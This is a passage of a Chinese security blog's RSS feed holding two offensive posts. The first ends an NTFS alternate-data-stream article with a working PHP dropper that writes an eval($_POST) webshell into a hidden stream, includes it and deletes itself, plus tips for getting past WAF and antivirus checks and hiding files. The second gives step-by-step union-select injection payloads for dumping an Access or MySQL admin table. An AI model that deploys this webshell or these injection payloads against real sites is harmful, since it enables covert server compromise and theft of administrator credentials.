&lt;pre&gt;&lt;code class=&quot;language-php&quot;&gt;&amp;lt;?php
exec(&apos;echo &quot;&amp;lt;?php @eval($_POST[key]);?&amp;gt;&quot;&amp;gt;&amp;gt;index.php:key.php&apos;);

$key = &amp;lt;&amp;lt;&amp;lt;key
echo &quot;&amp;lt;?php include &apos;index.php:key.php&apos;;?&amp;gt;&quot;&amp;gt;&amp;gt;a.php
key;

exec($key);
$url = $_SERVER[&apos;PHP_SELF&apos;];
$filename= substr($url,strrpos($url,&apos;/&apos;)+1);
@unlink($filename);
?&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/13.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;软件后门隐藏&quot;&gt;软件后门隐藏&lt;/h3&gt;

&lt;p&gt;使用特性1写一段代码后台自动运行这个文件流即可。&lt;/p&gt;

&lt;h3 id=&quot;bypass-waf&quot;&gt;ByPass WAF&lt;/h3&gt;

&lt;h4 id=&quot;文件上传&quot;&gt;文件上传&lt;/h4&gt;

&lt;p&gt;在文件上传的时候可以直接ByPass Waf规则，但是较为鸡肋需要搭配文件包含漏洞：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/14.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;h4 id=&quot;bypas-查杀&quot;&gt;Bypas 查杀&lt;/h4&gt;

&lt;p&gt;利用下面的默认流替换特性上传文件名为1.php:的文件，绕过后缀名限制即可。&lt;/p&gt;

&lt;p&gt;当然你也可以做一个持续性webshell后门，然后使用include包含起来即可利用：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/15.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;默认流替换&quot;&gt;默认流替换&lt;/h3&gt;

&lt;p&gt;默认流也就是宿主自身的，这里完全可以吞噬宿主，成为宿主。&lt;/p&gt;

&lt;p&gt;这个方法算是打破常规的认识了，很有意思。&lt;/p&gt;

&lt;p&gt;如图，我们直接执行&lt;code&gt;echo xxxx&amp;gt;&amp;gt;1.txt:&lt;/code&gt;，可替换默认流:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/16.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;当然如果宿主不存在，将会创建宿主并且吞噬宿主，从而成为宿主。&lt;/p&gt;

&lt;h2 id=&quot;ntfs局限性&quot;&gt;NTFS局限性&lt;/h2&gt;

&lt;p&gt;这个NTFS数据流文件，也叫Alternate data  streams，简称ADS，是NTFS文件系统的一个特性之一，允许单独的数据流文件存在，同时也允许一个文件附着多个数据流，即除了主文件流之外还允许许多非主文件流寄生在主文件流之中，它使用资源派生的方式来维持与文件相关信息，并且这些寄生的数据流文件我们使用资源管理器是看不到的。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2、为什么NTFS有数据流这个特性？&lt;/strong&gt;
原意是为了和Macintosh的HFS文件系统兼容而设计的，使用这种技术可以在一个文件资源里写入相关数据(并不是写入文件中)，而且写进去的数据可以使用很简单的方法把它提取出来作为一个独立文件读取，甚至执行。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3、为什么资源管理器里面看不到文件所带的数据流文件呢？&lt;/strong&gt;
我们之所以无法在系统中看到NTFS数据流文件，是因为Windows中的很多工具对数据流文件的支持并不是很好，就像“资源管理器”，我们无法在“资源管理器”中看到有关数据流文件的变化。&lt;/p&gt;

&lt;p&gt;不过这个原因很奇怪，同样是MS自己做的东西，”资源管理器都支持不好，还有啥工具能支持好呢？”   ，后来再想，也可能是这样一个原因：在当时写有关NTFS文件系统的数据流存储的时候很多WINDOWS工具没有相应的更新，同时呢NTFS流的显示与普通的文件不一样，需要使用其他的枚举方式来完成，再有NTFS对广大普通用户桌面用户来说没有必要去看到，更多的是被专业软件所使用，即使显示出来也没意义。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;OK，进入正题，那么我们今天来分析下NTFS文件流这个寄生虫的一些“缺点”&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;宿主需求，寄生虫需要宿主才可以繁衍。&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/17.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;共存状态。宿主死亡，寄生虫随之死亡。&lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;局限点突破&quot;&gt;局限点突破&lt;/h3&gt;

&lt;h4 id=&quot;宿主需求&quot;&gt;宿主需求&lt;/h4&gt;

&lt;h5 id=&quot;测试1&quot;&gt;测试1&lt;/h5&gt;

&lt;p&gt;一开始感觉无后缀名的会被windows自动隐藏起来，所以输入命令：&lt;code&gt;echo mstsec&amp;gt;&amp;gt;hi:ourlife.txt&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/18.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;然而是自己想多了。。。&lt;/p&gt;

&lt;h5 id=&quot;测试2&quot;&gt;测试2&lt;/h5&gt;

&lt;p&gt;后来想了下，Windows资源管理器是可以隐藏文件的，而默认的服务器隐藏文件是看不见的，也就是说，宿主是可以隐藏的&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;命令：attrib +s +h hi
解释：attrib命令的意思，+s是为文件添加系统文件属性，+h是添加隐藏属性的意思。&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/19.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;此方法可行，在一定的程度上保护了咱们的寄生虫。&lt;/p&gt;

&lt;p&gt;但是我这个人吧，有一个毛病，强迫症，就感觉不舒服，于是就开始了更隐蔽的测试。&lt;/p&gt;

&lt;h5 id=&quot;测试3&quot;&gt;测试3&lt;/h5&gt;

&lt;p&gt;我重新理了一下思路，既然是无宿主，那么就顺着这个路线开始慢慢的推进，那就试试无宿主自体繁衍：&lt;/p&gt;

&lt;p&gt;正常宿主寄生命令：&lt;code&gt;echo gh0stkey&amp;gt;&amp;gt;www:hiourlife.txt&lt;/code&gt;
www是宿主文件，无宿主就删掉www呗~
修改后的命令：&lt;code&gt;echo gh0stkey&amp;gt;&amp;gt;:hiourlife.txt&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/20.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;结果：无宿主寄生，完全是可以的。&lt;strong&gt;测试3成功&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;其实这个命令就是将寄生虫寄生到文件夹上，转换一下命令就成了：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;echo gh0stkey&amp;gt;&amp;gt;/:hiourlife.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;那么运用在实际测试中，只要目录不变动，就不会被（安全狗之类的WAF）发现&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/21.jpg&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-29/22.png&quot; alt=&quot;ntfs&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;end&quot;&gt;END&lt;/h1&gt;

&lt;p&gt;原文件=宿主，文件流=寄生虫。各位朋友根据根据这篇文章的基础继续深入研究，把文件流应用于各种操作之中，造出”猥琐”流。&lt;/p&gt;
</description>
          <pubDate>2017-03-29T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2017-03-29/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2017-03-29/1</guid>
        </item>
      
    
      
        <item>
          <title>移位溢注：告别依靠人品的偏移注入</title>
          <description>&lt;h2 id=&quot;介绍&quot;&gt;&lt;strong&gt;介绍&lt;/strong&gt;：&lt;/h2&gt;

&lt;p&gt;在Access数据库类型注入的时候，我们获取不到列名(前提是有表名)，一般会选择使用偏移注入，但是这种注入方式往往借助的是个人的人品，且步骤繁琐。本文中我们研究了一种新的注入技术让“偏移注入不在需要人品”。在这里定义这种注入技术为：“移位溢注技术”。
它适用于ACCESS和MYSQL（任何版本）&lt;/p&gt;

&lt;h2 id=&quot;正文&quot;&gt;&lt;strong&gt;正文：&lt;/strong&gt;&lt;/h2&gt;

&lt;p&gt;我们先来看看普通的偏移注入步骤：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;1.判断注入点
2.order by 判断长度
3.判断表名
4.联合查询
5.获取表中列数：**union select 1,2,3,4,..,\* from TABLE**
6.开始偏移注入：**TABLE as a inner join TABLE as b ona.id=b.id**
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;由于步骤6的方法过于需要人品值，且语句繁琐，因此在这里，我们研究新的注入技术：&lt;/p&gt;

&lt;p&gt;首先来看看步骤6语句的整体意思：&lt;/p&gt;

&lt;p&gt;步骤6的语句，&lt;strong&gt;表示给TALBE取2个别名，然后分别用别名取查询TALBE的内容（表a和表b）；而on a.id = b.id 这样的条件是为了满足语法需求，实际并没有作用，因为相同内容的表，相同字段内容一定相同。&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;这时，我们再回过头来看步骤5：&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;由于联合查询中select后面添加数字的目的是为了让联合查询返回接结果和网站正常查询返回的结果的列数一致（不一致数据库会报错，页面无法显示），且*表示通配符，可以表示整个表格所有列；因此这里通过数字来占位，并使用*来替代TABLE中的所有列，使得联合查询可以完成，并推算出*的值。&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;这时候我们继续研究偏移注入的整体公式方法，发现即使使用多级偏移注入也需要一定的概率(人品值)才可以得到想要的结果，所以我们就尝试研究新的方法能不能替换这种不固定概率的方法。&lt;/p&gt;

&lt;p&gt;现在我们重新整理一下SQL语句，从联合查询开始：&lt;/p&gt;

&lt;p&gt;1.原union语句：&lt;strong&gt;union select 1,2,3,..,p..,n from TABLE&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;（p=页面爆出的数字，可能有多个p1,p2..；n=原网站查询的总列数；TALBE=我们获得的表名；下面开始就使用上述字母的定义）&lt;/p&gt;

&lt;p&gt;2.新语句：&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;union select 1,2,3,..,p-1,TABLE.*,p+k,..,nfrom TABLE where&lt;/strong&gt; &lt;strong&gt;字段名&lt;/strong&gt; &lt;strong&gt;=&lt;/strong&gt; &lt;strong&gt;字段内容&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;–在p的位置爆出TALBE表中第一个字段的内容（其他位置还可能爆出更多内容）&lt;/p&gt;

&lt;p&gt;（这里如果存在已知字段名可以使用，没有就不用，一般id这个字段时存在的，可以使用id = 1来显示第一行）&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;union select1,2,3,..,p-2,TABLE.*,p+k-1,..,n from TABLE where&lt;/strong&gt; &lt;strong&gt;字段名&lt;/strong&gt; &lt;strong&gt;=&lt;/strong&gt; &lt;strong&gt;字段内容&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;–在p的位置爆出TALBE表中第二个字段的内容（其他位置还可能爆出更多内容）&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;union select 1,2,3,..,p-3,TABLE.*,p+k-2,..,nfrom TABLE where&lt;/strong&gt; &lt;strong&gt;字段名&lt;/strong&gt; &lt;strong&gt;=&lt;/strong&gt; &lt;strong&gt;字段内容&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;–在p的位置爆出TALBE表中第三个字段的内容（其他位置还可能爆出更多内容）&lt;/p&gt;

&lt;p&gt;注：这里一定是TALBE.&lt;em&gt;而不是&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;3.1 &lt;strong&gt;以此类推可以爆出TALBE的每一列内容。&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;3.2 &lt;strong&gt;如果p&amp;lt;k则没法爆出p+1列至k列的内容，如果n-p&amp;lt;k则无法爆出第1列至k-(n-p)列&lt;/strong&gt;。&lt;/p&gt;

&lt;h2 id=&quot;原理&quot;&gt;&lt;strong&gt;原理：&lt;/strong&gt;&lt;/h2&gt;

&lt;p&gt;1.由原语句：&lt;strong&gt;union select 1,2,3,..,p..,n-k,* from TABLE&lt;/strong&gt; 可以得出该联合查询的目的是构造和原网站相同列数的查询结构，使得页面上可以显示对应的数字；这条语句相当于是做了两次查询并将它们的结果合并，第一次做了&lt;strong&gt;select 1,2,3,..,n-k from TALBE&lt;/strong&gt; ，第二次做了&lt;strong&gt;select * from TALBE&lt;/strong&gt; ，然后将它们的结果合并。&lt;/p&gt;

&lt;p&gt;这可以参考mysql的语句：&lt;strong&gt;select 1,2,3,4,5,admin.* from admin;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x00.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x01.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x02.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;2.只要满足原理1的要求，保障联合查询的结果和原网站查询的结果列数一致即可；因此可以将TALBE.*向前移动至页面显示的数字处来爆出TALBE列中的内容。&lt;/p&gt;

&lt;p&gt;这可以参考mysql的语句：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-mysql&quot;&gt;select 1,2,3,4,5,6,7,8,9,10 from newswhere id =1 union select 1,2,3,4,5,6,7,admin.* from admin;
select 1,2,3,4,5,6,7,8,9,10 from newswhere id =1 union select 1,2,3,admin.*,7,8,9,10 from admin;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;strong&gt;注：假设数字4、5在页面显示。&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;由下图可知，其实数据已近查询出来，但是页面没有显示，这个是通过平移查询结果到页面显示的数字上去，即可爆出敏感字段。&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x03.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x04.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;例子&quot;&gt;&lt;strong&gt;例子：&lt;/strong&gt;&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;步骤1：&lt;/strong&gt;判断注入点是否存在&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x05.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;步骤2：&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x06.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x07.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;步骤3：&lt;/strong&gt;获得表名(必备条件)   and exists(select * from admin)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x08.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;步骤4：&lt;/strong&gt;获取不了列名（当尝试多个常用字段名以后，最终还是发现无法获得字段名）&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;步骤5：&lt;/strong&gt;使用联合查询(union select)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x09.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x010.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;步骤6：使用新注入技术方法&lt;/p&gt;

&lt;p&gt;（1）获取admin表的列数：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-mysql&quot;&gt;UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,*from admin #--返回错误页面

UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,*from admin #--返回错误页面

UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,*from admin #--返回错误页面

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,*from admin #--返回错误页面
.....

UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,*from admin #--返回步骤5页面，因此admin表的列数为6
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x011.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x012.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x013.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;（2）由于网页中包含连续数字，表示可以显示连续的查询结果，构造SQL语句查询前四列第一行。&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-mysql&quot;&gt;UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35from admin
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x014.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x015.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-mysql&quot;&gt;UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,admin.*,34,35from admin where id = 3
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2017-03-08/0x016.jpg&quot; alt=&quot;img&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;总结&quot;&gt;&lt;strong&gt;总结&lt;/strong&gt;&lt;/h2&gt;

&lt;p&gt;在这里我们命名这种新注入技术为”移位溢注”。由此如果MYSQL小于5.0的情况下所具备的条件和ACCESS一样，也可以使用此方法注入，如果是MYSQL大于5.0的版本，使用此方法可以省去获得列名的步骤。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;文章研究：&lt;/strong&gt;gh0stkey &amp;amp; Seagull&lt;/p&gt;
</description>
          <pubDate>2017-03-08T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2017-03-08/1</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2017-03-08/1</guid>
        </item>
      
    
  </channel>
</rss>
